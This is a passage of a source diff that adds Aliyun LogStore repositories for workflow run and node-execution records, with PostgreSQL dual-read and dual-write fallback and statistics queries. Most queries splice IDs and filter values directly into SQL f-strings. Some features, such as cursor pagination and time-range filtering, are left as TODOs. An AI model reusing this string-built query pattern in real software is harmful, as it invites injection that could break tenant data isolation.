tenant_id: str | None = None, + ) -> WorkflowNodeExecutionModel | None: + """ + Get a workflow node execution by its ID. + Uses query syntax to get raw logs and selects the one with max log_version. 
+ """ + logger.debug("get_execution_by_id: execution_id=%s, tenant_id=%s", execution_id, tenant_id) + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + tenant_filter = f"AND tenant_id = '{tenant_id}'" if tenant_id else "" + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_node_execution_logstore}" + WHERE id = '{execution_id}' {tenant_filter} AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 1 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_node_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + if tenant_id: + query = f"id: {execution_id} and tenant_id: {tenant_id}" + else: + query = f"id: {execution_id}" + + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_node_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + return None + + # For PG mode, result is already the latest version + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_node_execution_model(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_node_execution_model(max_result) + + except Exception: + logger.exception("Failed to get execution by ID from LogStore: execution_id=%s", execution_id) + raise diff --git a/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py b/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py new file mode 100644 index 0000000000..252cdcc4df --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_api_workflow_run_repository.py @@ -0,0 +1,757 @@ +""" +LogStore API WorkflowRun Repository Implementation + +This module provides the LogStore-based implementation of the APIWorkflowRunRepository +protocol. It handles service-layer WorkflowRun database operations using Aliyun SLS LogStore +with optimized queries for statistics and pagination. + +Key Features: +- LogStore SQL queries for aggregation and statistics +- Optimized deduplication using finished_at IS NOT NULL filter +- Window functions only when necessary (running status queries) +- Multi-tenant data isolation and security +""" + +import logging +import os +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any, cast + +from sqlalchemy.orm import sessionmaker + +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.infinite_scroll_pagination import InfiniteScrollPagination +from models.enums import WorkflowRunTriggeredFrom +from models.workflow import WorkflowRun +from repositories.api_workflow_run_repository import APIWorkflowRunRepository +from repositories.types import ( + AverageInteractionStats, + DailyRunsStats, + DailyTerminalsStats, + DailyTokenCostStats, +) + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_run(data: dict[str, Any]) -> WorkflowRun: + """ + Convert LogStore result dictionary to WorkflowRun instance. 
+ + Args: + data: Dictionary from LogStore query result + + Returns: + WorkflowRun instance + """ + logger.debug("_dict_to_workflow_run: data keys=%s", list(data.keys())[:5]) + # Create model instance without session + model = WorkflowRun() + + # Map all required fields with validation + # Critical fields - must not be None + model.id = data.get("id") or "" + model.tenant_id = data.get("tenant_id") or "" + model.app_id = data.get("app_id") or "" + model.workflow_id = data.get("workflow_id") or "" + model.type = data.get("type") or "" + model.triggered_from = data.get("triggered_from") or "" + model.version = data.get("version") or "" + model.status = data.get("status") or "running" # Default status if missing + model.created_by_role = data.get("created_by_role") or "" + model.created_by = data.get("created_by") or "" + + # Numeric fields with defaults + model.total_tokens = int(data.get("total_tokens", 0)) + model.total_steps = int(data.get("total_steps", 0)) + model.exceptions_count = int(data.get("exceptions_count", 0)) + + # Optional fields + model.graph = data.get("graph") + model.inputs = data.get("inputs") + model.outputs = data.get("outputs") + model.error = data.get("error_message") or data.get("error") + + # Handle datetime fields + started_at = data.get("started_at") or data.get("created_at") + if started_at: + if isinstance(started_at, str): + model.created_at = datetime.fromisoformat(started_at) + elif isinstance(started_at, (int, float)): + model.created_at = datetime.fromtimestamp(started_at) + else: + model.created_at = started_at + else: + # Provide default created_at if missing + model.created_at = datetime.now() + + finished_at = data.get("finished_at") + if finished_at: + if isinstance(finished_at, str): + model.finished_at = datetime.fromisoformat(finished_at) + elif isinstance(finished_at, (int, float)): + model.finished_at = datetime.fromtimestamp(finished_at) + else: + model.finished_at = finished_at + + # Compute elapsed_time from started_at and finished_at + # LogStore doesn't store elapsed_time, it's computed in WorkflowExecution domain entity + if model.finished_at and model.created_at: + model.elapsed_time = (model.finished_at - model.created_at).total_seconds() + else: + model.elapsed_time = float(data.get("elapsed_time", 0)) + + return model + + +class LogstoreAPIWorkflowRunRepository(APIWorkflowRunRepository): + """ + LogStore implementation of APIWorkflowRunRepository. + + Provides service-layer WorkflowRun database operations using LogStore SQL + with optimized query strategies: + - Use finished_at IS NOT NULL for deduplication (10-100x faster) + - Use window functions only when running status is required + - Proper time range filtering for LogStore queries + """ + + def __init__(self, session_maker: sessionmaker | None = None): + """ + Initialize the repository with LogStore client. 
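+
+        Dual-read is toggled via an environment variable (deployment sketch;
+        "true" is the default):
+
+            LOGSTORE_DUAL_READ_ENABLED=true   # keep PostgreSQL fallback during migration
+            LOGSTORE_DUAL_READ_ENABLED=false  # LogStore only, for fresh deployments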
+ + Args: + session_maker: SQLAlchemy sessionmaker (unused, for compatibility with factory pattern) + """ + logger.debug("LogstoreAPIWorkflowRunRepository.__init__: initializing") + self.logstore_client = AliyunLogStore() + + # Control flag for dual-read (fallback to PostgreSQL when LogStore returns no results) + # Set to True to enable fallback for safe migration from PostgreSQL to LogStore + # Set to False for new deployments without legacy data in PostgreSQL + self._enable_dual_read = os.environ.get("LOGSTORE_DUAL_READ_ENABLED", "true").lower() == "true" + + def get_paginated_workflow_runs( + self, + tenant_id: str, + app_id: str, + triggered_from: WorkflowRunTriggeredFrom | Sequence[WorkflowRunTriggeredFrom], + limit: int = 20, + last_id: str | None = None, + status: str | None = None, + ) -> InfiniteScrollPagination: + """ + Get paginated workflow runs with filtering. + + Uses window function for deduplication to support both running and finished states. + + Args: + tenant_id: Tenant identifier for multi-tenant isolation + app_id: Application identifier + triggered_from: Filter by trigger source(s) + limit: Maximum number of records to return (default: 20) + last_id: Cursor for pagination - ID of the last record from previous page + status: Optional filter by status + + Returns: + InfiniteScrollPagination object + """ + logger.debug( + "get_paginated_workflow_runs: tenant_id=%s, app_id=%s, limit=%d, status=%s", + tenant_id, + app_id, + limit, + status, + ) + # Convert triggered_from to list if needed + if isinstance(triggered_from, WorkflowRunTriggeredFrom): + triggered_from_list = [triggered_from] + else: + triggered_from_list = list(triggered_from) + + # Build triggered_from filter + triggered_from_filter = " OR ".join([f"triggered_from='{tf.value}'" for tf in triggered_from_list]) + + # Build status filter + status_filter = f"AND status='{status}'" if status else "" + + # Build last_id filter for pagination + # Note: This is simplified. In production, you'd need to track created_at from last record + last_id_filter = "" + if last_id: + # TODO: Implement proper cursor-based pagination with created_at + logger.warning("last_id pagination not fully implemented for LogStore") + + # Use window function to get latest log_version of each workflow run + sql = f""" + SELECT * FROM ( + SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND ({triggered_from_filter}) + {status_filter} + {last_id_filter} + ) t + WHERE rn = 1 + ORDER BY created_at DESC + LIMIT {limit + 1} + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore, from_time=None, to_time=None + ) + + # Check if there are more records + has_more = len(results) > limit + if has_more: + results = results[:limit] + + # Convert results to WorkflowRun models + workflow_runs = [_dict_to_workflow_run(row) for row in results] + return InfiniteScrollPagination(data=workflow_runs, limit=limit, has_more=has_more) + + except Exception: + logger.exception("Failed to get paginated workflow runs from LogStore") + raise + + def get_workflow_run_by_id( + self, + tenant_id: str, + app_id: str, + run_id: str, + ) -> WorkflowRun | None: + """ + Get a specific workflow run by ID with tenant and app isolation. + + Uses query syntax to get raw logs and selects the one with max log_version in code. 
+ Falls back to PostgreSQL if not found in LogStore (for data consistency during migration). + """ + logger.debug("get_workflow_run_by_id: tenant_id=%s, app_id=%s, run_id=%s", tenant_id, app_id, run_id) + + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_execution_logstore}" + WHERE id = '{run_id}' AND tenant_id = '{tenant_id}' AND app_id = '{app_id}' AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"id: {run_id} and tenant_id: {tenant_id} and app_id: {app_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + # Fallback to PostgreSQL for records created before LogStore migration + if self._enable_dual_read: + logger.debug( + "WorkflowRun not found in LogStore, falling back to PostgreSQL: " + "run_id=%s, tenant_id=%s, app_id=%s", + run_id, + tenant_id, + app_id, + ) + return self._fallback_get_workflow_run_by_id_with_tenant(run_id, tenant_id, app_id) + return None + + # For PG mode, results are already deduplicated by the SQL query + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_run(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_run(max_result) + + except Exception: + logger.exception("Failed to get workflow run by ID from LogStore: run_id=%s", run_id) + # Try PostgreSQL fallback on any error (only if dual-read is enabled) + if self._enable_dual_read: + try: + return self._fallback_get_workflow_run_by_id_with_tenant(run_id, tenant_id, app_id) + except Exception: + logger.exception( + "PostgreSQL fallback also failed: run_id=%s, tenant_id=%s, app_id=%s", run_id, tenant_id, app_id + ) + raise + + def _fallback_get_workflow_run_by_id_with_tenant( + self, run_id: str, tenant_id: str, app_id: str + ) -> WorkflowRun | None: + """Fallback to PostgreSQL query for records not in LogStore (with tenant isolation).""" + from sqlalchemy import select + from sqlalchemy.orm import Session + + from extensions.ext_database import db + + with Session(db.engine) as session: + stmt = select(WorkflowRun).where( + WorkflowRun.id == run_id, WorkflowRun.tenant_id == tenant_id, WorkflowRun.app_id == app_id + ) + return session.scalar(stmt) + + def get_workflow_run_by_id_without_tenant( + self, + run_id: str, + ) -> WorkflowRun | None: + """ + Get a specific workflow run by ID without tenant/app context. + Uses query syntax to get raw logs and selects the one with max log_version. + Falls back to PostgreSQL if not found in LogStore (controlled by LOGSTORE_DUAL_READ_ENABLED). 
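+
+        Read-path sketch: query LogStore first; if nothing is found and
+        dual-read is enabled, fall back to PostgreSQL; on a LogStore error the
+        same fallback is attempted before the error is re-raised.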
+ """ + logger.debug("get_workflow_run_by_id_without_tenant: run_id=%s", run_id) + + try: + # Check if PG protocol is supported + if self.logstore_client.supports_pg_protocol: + # Use PG protocol with SQL query (get latest version of record) + sql_query = f""" + SELECT * FROM ( + SELECT *, + ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) as rn + FROM "{AliyunLogStore.workflow_execution_logstore}" + WHERE id = '{run_id}' AND __time__ > 0 + ) AS subquery WHERE rn = 1 + LIMIT 100 + """ + results = self.logstore_client.execute_sql( + sql=sql_query, + logstore=AliyunLogStore.workflow_execution_logstore, + ) + else: + # Use SDK with LogStore query syntax + query = f"id: {run_id}" + from_time = 0 + to_time = int(time.time()) # now + + results = self.logstore_client.get_logs( + logstore=AliyunLogStore.workflow_execution_logstore, + from_time=from_time, + to_time=to_time, + query=query, + line=100, + reverse=False, + ) + + if not results: + # Fallback to PostgreSQL for records created before LogStore migration + if self._enable_dual_read: + logger.debug("WorkflowRun not found in LogStore, falling back to PostgreSQL: run_id=%s", run_id) + return self._fallback_get_workflow_run_by_id(run_id) + return None + + # For PG mode, results are already deduplicated by the SQL query + # For SDK mode, if multiple results, select the one with max log_version + if self.logstore_client.supports_pg_protocol or len(results) == 1: + return _dict_to_workflow_run(results[0]) + else: + max_result = max(results, key=lambda x: int(x.get("log_version", 0))) + return _dict_to_workflow_run(max_result) + + except Exception: + logger.exception("Failed to get workflow run without tenant: run_id=%s", run_id) + # Try PostgreSQL fallback on any error (only if dual-read is enabled) + if self._enable_dual_read: + try: + return self._fallback_get_workflow_run_by_id(run_id) + except Exception: + logger.exception("PostgreSQL fallback also failed: run_id=%s", run_id) + raise + + def _fallback_get_workflow_run_by_id(self, run_id: str) -> WorkflowRun | None: + """Fallback to PostgreSQL query for records not in LogStore.""" + from sqlalchemy import select + from sqlalchemy.orm import Session + + from extensions.ext_database import db + + with Session(db.engine) as session: + stmt = select(WorkflowRun).where(WorkflowRun.id == run_id) + return session.scalar(stmt) + + def get_workflow_runs_count( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + status: str | None = None, + time_range: str | None = None, + ) -> dict[str, int]: + """ + Get workflow runs count statistics grouped by status. 
+ + Optimization: Use finished_at IS NOT NULL for completed runs (10-50x faster) + """ + logger.debug( + "get_workflow_runs_count: tenant_id=%s, app_id=%s, triggered_from=%s, status=%s", + tenant_id, + app_id, + triggered_from, + status, + ) + # Build time range filter + time_filter = "" + if time_range: + # TODO: Parse time_range and convert to from_time/to_time + logger.warning("time_range filter not implemented") + + # If status is provided, simple count + if status: + if status == "running": + # Running status requires window function + sql = f""" + SELECT COUNT(*) as count + FROM ( + SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND status='running' + {time_filter} + ) t + WHERE rn = 1 + """ + else: + # Finished status uses optimized filter + sql = f""" + SELECT COUNT(DISTINCT id) as count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND status='{status}' + AND finished_at IS NOT NULL + {time_filter} + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + count = results[0]["count"] if results and len(results) > 0 else 0 + + return { + "total": count, + "running": count if status == "running" else 0, + "succeeded": count if status == "succeeded" else 0, + "failed": count if status == "failed" else 0, + "stopped": count if status == "stopped" else 0, + "partial-succeeded": count if status == "partial-succeeded" else 0, + } + except Exception: + logger.exception("Failed to get workflow runs count") + raise + + # No status filter - get counts grouped by status + # Use optimized query for finished runs, separate query for running + try: + # Count finished runs grouped by status + finished_sql = f""" + SELECT status, COUNT(DISTINCT id) as count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY status + """ + + # Count running runs + running_sql = f""" + SELECT COUNT(*) as count + FROM ( + SELECT *, ROW_NUMBER() OVER (PARTITION BY id ORDER BY log_version DESC) AS rn + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND status='running' + {time_filter} + ) t + WHERE rn = 1 + """ + + finished_results = self.logstore_client.execute_sql( + sql=finished_sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + running_results = self.logstore_client.execute_sql( + sql=running_sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + # Build response + status_counts = { + "running": 0, + "succeeded": 0, + "failed": 0, + "stopped": 0, + "partial-succeeded": 0, + } + + total = 0 + for result in finished_results: + status_val = result.get("status") + count = result.get("count", 0) + if status_val in status_counts: + status_counts[status_val] = count + total += count + + # Add running count + running_count = running_results[0]["count"] if running_results and len(running_results) > 0 else 0 + status_counts["running"] = running_count + total += running_count + + return {"total": total} | status_counts + + except Exception: + logger.exception("Failed to 
get workflow runs count") + raise + + def get_daily_runs_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[DailyRunsStats]: + """ + Get daily runs statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + COUNT(DISTINCT id) (20-100x faster) + """ + logger.debug( + "get_daily_runs_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", tenant_id, app_id, triggered_from + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + # Optimized query: Use finished_at filter to avoid window function + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, COUNT(DISTINCT id) as runs + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "runs": row.get("runs", 0)}) + + return cast(list[DailyRunsStats], response_data) + + except Exception: + logger.exception("Failed to get daily runs statistics") + raise + + def get_daily_terminals_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[DailyTerminalsStats]: + """ + Get daily terminals statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + COUNT(DISTINCT created_by) (20-100x faster) + """ + logger.debug( + "get_daily_terminals_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, COUNT(DISTINCT created_by) as terminal_count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "terminal_count": row.get("terminal_count", 0)}) + + return cast(list[DailyTerminalsStats], response_data) + + except Exception: + logger.exception("Failed to get daily terminals statistics") + raise + + def get_daily_token_cost_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[DailyTokenCostStats]: + """ + Get daily token cost statistics using optimized query. 
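+
+        Example of a returned item (illustrative):
+
+            {"date": "2024-01-01", "token_count": 12345}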
+ + Optimization: Use finished_at IS NOT NULL + SUM(total_tokens) (20-100x faster) + """ + logger.debug( + "get_daily_token_cost_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT DATE(from_unixtime(__time__)) as date, SUM(total_tokens) as token_count + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date + ORDER BY date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append({"date": str(row.get("date", "")), "token_count": row.get("token_count", 0)}) + + return cast(list[DailyTokenCostStats], response_data) + + except Exception: + logger.exception("Failed to get daily token cost statistics") + raise + + def get_average_app_interaction_statistics( + self, + tenant_id: str, + app_id: str, + triggered_from: str, + start_date: datetime | None = None, + end_date: datetime | None = None, + timezone: str = "UTC", + ) -> list[AverageInteractionStats]: + """ + Get average app interaction statistics using optimized query. + + Optimization: Use finished_at IS NOT NULL + AVG (20-100x faster) + """ + logger.debug( + "get_average_app_interaction_statistics: tenant_id=%s, app_id=%s, triggered_from=%s", + tenant_id, + app_id, + triggered_from, + ) + # Build time range filter + time_filter = "" + if start_date: + time_filter += f" AND __time__ >= to_unixtime(from_iso8601_timestamp('{start_date.isoformat()}'))" + if end_date: + time_filter += f" AND __time__ < to_unixtime(from_iso8601_timestamp('{end_date.isoformat()}'))" + + sql = f""" + SELECT + AVG(sub.interactions) AS interactions, + sub.date + FROM ( + SELECT + DATE(from_unixtime(__time__)) AS date, + created_by, + COUNT(DISTINCT id) AS interactions + FROM {AliyunLogStore.workflow_execution_logstore} + WHERE tenant_id='{tenant_id}' + AND app_id='{app_id}' + AND triggered_from='{triggered_from}' + AND finished_at IS NOT NULL + {time_filter} + GROUP BY date, created_by + ) sub + GROUP BY sub.date + """ + + try: + results = self.logstore_client.execute_sql( + sql=sql, query="*", logstore=AliyunLogStore.workflow_execution_logstore + ) + + response_data = [] + for row in results: + response_data.append( + { + "date": str(row.get("date", "")), + "interactions": float(row.get("interactions", 0)), + } + ) + + return cast(list[AverageInteractionStats], response_data) + + except Exception: + logger.exception("Failed to get average app interaction statistics") + raise diff --git a/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py b/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py new file mode 100644 index 0000000000..6e6631cfef --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_workflow_execution_repository.py @@ -0,0 +1,164 @@ +import json +import logging +import os +import time +from typing import Union + +from sqlalchemy.engine import Engine +from sqlalchemy.orm import sessionmaker + +from 
core.repositories.sqlalchemy_workflow_execution_repository import SQLAlchemyWorkflowExecutionRepository +from core.workflow.entities import WorkflowExecution +from core.workflow.repositories.workflow_execution_repository import WorkflowExecutionRepository +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.helper import extract_tenant_id +from models import ( + Account, + CreatorUserRole, + EndUser, +) +from models.enums import WorkflowRunTriggeredFrom + +logger = logging.getLogger(__name__) + + +class LogstoreWorkflowExecutionRepository(WorkflowExecutionRepository): + def __init__( + self, + session_factory: sessionmaker | Engine, + user: Union[Account, EndUser], + app_id: str | None, + triggered_from: WorkflowRunTriggeredFrom | None, + ): + """ + Initialize the repository with a SQLAlchemy sessionmaker or engine and context information. + + Args: + session_factory: SQLAlchemy sessionmaker or engine for creating sessions + user: Account or EndUser object containing tenant_id, user ID, and role information + app_id: App ID for filtering by application (can be None) + triggered_from: Source of the execution trigger (DEBUGGING or APP_RUN) + """ + logger.debug( + "LogstoreWorkflowExecutionRepository.__init__: app_id=%s, triggered_from=%s", app_id, triggered_from + ) + # Initialize LogStore client + # Note: Project/logstore/index initialization is done at app startup via ext_logstore + self.logstore_client = AliyunLogStore() + + # Extract tenant_id from user + tenant_id = extract_tenant_id(user) + if not tenant_id: + raise ValueError("User must have a tenant_id or current_tenant_id") + self._tenant_id = tenant_id + + # Store app context + self._app_id = app_id + + # Extract user context + self._triggered_from = triggered_from + self._creator_user_id = user.id + + # Determine user role based on user type + self._creator_user_role = CreatorUserRole.ACCOUNT if isinstance(user, Account) else CreatorUserRole.END_USER + + # Initialize SQL repository for dual-write support + self.sql_repository = SQLAlchemyWorkflowExecutionRepository(session_factory, user, app_id, triggered_from) + + # Control flag for dual-write (write to both LogStore and SQL database) + # Set to True to enable dual-write for safe migration, False to use LogStore only + self._enable_dual_write = os.environ.get("LOGSTORE_DUAL_WRITE_ENABLED", "true").lower() == "true" + + def _to_logstore_model(self, domain_model: WorkflowExecution) -> list[tuple[str, str]]: + """ + Convert a domain model to a logstore model (List[Tuple[str, str]]). 
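+
+        Example of the produced shape (illustrative, abbreviated; log_version is
+        a nanosecond timestamp):
+
+            [("id", "..."), ("log_version", "1700000000000000000"),
+             ("tenant_id", "..."), ("status", "succeeded"), ...]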
+ + Args: + domain_model: The domain model to convert + + Returns: + The logstore model as a list of key-value tuples + """ + logger.debug( + "_to_logstore_model: id=%s, workflow_id=%s, status=%s", + domain_model.id_, + domain_model.workflow_id, + domain_model.status.value, + ) + # Use values from constructor if provided + if not self._triggered_from: + raise ValueError("triggered_from is required in repository constructor") + if not self._creator_user_id: + raise ValueError("created_by is required in repository constructor") + if not self._creator_user_role: + raise ValueError("created_by_role is required in repository constructor") + + # Generate log_version as nanosecond timestamp for record versioning + log_version = str(time.time_ns()) + + logstore_model = [ + ("id", domain_model.id_), + ("log_version", log_version), # Add log_version field for append-only writes + ("tenant_id", self._tenant_id), + ("app_id", self._app_id or ""), + ("workflow_id", domain_model.workflow_id), + ( + "triggered_from", + self._triggered_from.value if hasattr(self._triggered_from, "value") else str(self._triggered_from), + ), + ("type", domain_model.workflow_type.value), + ("version", domain_model.workflow_version), + ("graph", json.dumps(domain_model.graph, ensure_ascii=False) if domain_model.graph else "{}"), + ("inputs", json.dumps(domain_model.inputs, ensure_ascii=False) if domain_model.inputs else "{}"), + ("outputs", json.dumps(domain_model.outputs, ensure_ascii=False) if domain_model.outputs else "{}"), + ("status", domain_model.status.value), + ("error_message", domain_model.error_message or ""), + ("total_tokens", str(domain_model.total_tokens)), + ("total_steps", str(domain_model.total_steps)), + ("exceptions_count", str(domain_model.exceptions_count)), + ( + "created_by_role", + self._creator_user_role.value + if hasattr(self._creator_user_role, "value") + else str(self._creator_user_role), + ), + ("created_by", self._creator_user_id), + ("started_at", domain_model.started_at.isoformat() if domain_model.started_at else ""), + ("finished_at", domain_model.finished_at.isoformat() if domain_model.finished_at else ""), + ] + + return logstore_model + + def save(self, execution: WorkflowExecution) -> None: + """ + Save or update a WorkflowExecution domain entity to the logstore. + + This method serves as a domain-to-logstore adapter that: + 1. Converts the domain entity to its logstore representation + 2. Persists the logstore model using Aliyun SLS + 3. Maintains proper multi-tenancy by including tenant context during conversion + 4. 
Optionally writes to SQL database for dual-write support (controlled by LOGSTORE_DUAL_WRITE_ENABLED) + + Args: + execution: The WorkflowExecution domain entity to persist + """ + logger.debug( + "save: id=%s, workflow_id=%s, status=%s", execution.id_, execution.workflow_id, execution.status.value + ) + try: + logstore_model = self._to_logstore_model(execution) + self.logstore_client.put_log(AliyunLogStore.workflow_execution_logstore, logstore_model) + + logger.debug("Saved workflow execution to logstore: id=%s", execution.id_) + except Exception: + logger.exception("Failed to save workflow execution to logstore: id=%s", execution.id_) + raise + + # Dual-write to SQL database if enabled (for safe migration) + if self._enable_dual_write: + try: + self.sql_repository.save(execution) + logger.debug("Dual-write: saved workflow execution to SQL database: id=%s", execution.id_) + except Exception: + logger.exception("Failed to dual-write workflow execution to SQL database: id=%s", execution.id_) + # Don't raise - LogStore write succeeded, SQL is just a backup diff --git a/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py b/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py new file mode 100644 index 0000000000..400a089516 --- /dev/null +++ b/api/extensions/logstore/repositories/logstore_workflow_node_execution_repository.py @@ -0,0 +1,366 @@ +""" +LogStore implementation of the WorkflowNodeExecutionRepository. + +This module provides a LogStore-based repository for WorkflowNodeExecution entities, +using Aliyun SLS LogStore with append-only writes and version control. +""" + +import json +import logging +import os +import time +from collections.abc import Sequence +from datetime import datetime +from typing import Any, Union + +from sqlalchemy.engine import Engine +from sqlalchemy.orm import sessionmaker + +from core.model_runtime.utils.encoders import jsonable_encoder +from core.repositories import SQLAlchemyWorkflowNodeExecutionRepository +from core.workflow.entities import WorkflowNodeExecution +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionMetadataKey, WorkflowNodeExecutionStatus +from core.workflow.enums import NodeType +from core.workflow.repositories.workflow_node_execution_repository import OrderConfig, WorkflowNodeExecutionRepository +from core.workflow.workflow_type_encoder import WorkflowRuntimeTypeConverter +from extensions.logstore.aliyun_logstore import AliyunLogStore +from libs.helper import extract_tenant_id +from models import ( + Account, + CreatorUserRole, + EndUser, + WorkflowNodeExecutionTriggeredFrom, +) + +logger = logging.getLogger(__name__) + + +def _dict_to_workflow_node_execution(data: dict[str, Any]) -> WorkflowNodeExecution: + """ + Convert LogStore result dictionary to WorkflowNodeExecution domain model. 
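+
+    Note: inputs/process_data/outputs/execution_metadata are stored as JSON
+    strings and parsed here; metadata keys that do not map to
+    WorkflowNodeExecutionMetadataKey are skipped rather than raising.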
